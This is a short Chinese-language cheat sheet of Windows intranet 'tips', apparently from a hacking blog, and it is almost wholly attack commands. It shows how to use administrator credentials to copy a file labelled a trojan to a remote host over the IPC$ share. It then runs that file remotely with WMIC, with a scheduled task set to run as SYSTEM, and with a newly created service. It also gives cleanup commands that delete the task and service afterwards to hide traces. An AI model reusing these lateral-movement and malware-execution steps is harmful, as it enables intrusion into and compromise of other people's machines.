内网的一点TIPS…

net use \\HOST\ipc$ /user:administrator PASSWORD
copy muma.exe \\host\c$\windows\temp\foobar.exe     ##IPC拷贝木马文件

 

WMIC远程运行命令

wmic /node:host /user:administrator /password:密码 process call create "c:\windows\temp\foobar.exe"

 

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System 

schtasks /run /tn foobar /S host 

schtasks /F /delete /tn foobar /S host ##清除schtasks

 

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe”    ##新建服务,指向拷贝的木马路径 

sc \\host start foobar        ##启动建立的服务 
sc \\host delete foobar    ##完事后删除服务
源链接

Hacking more

...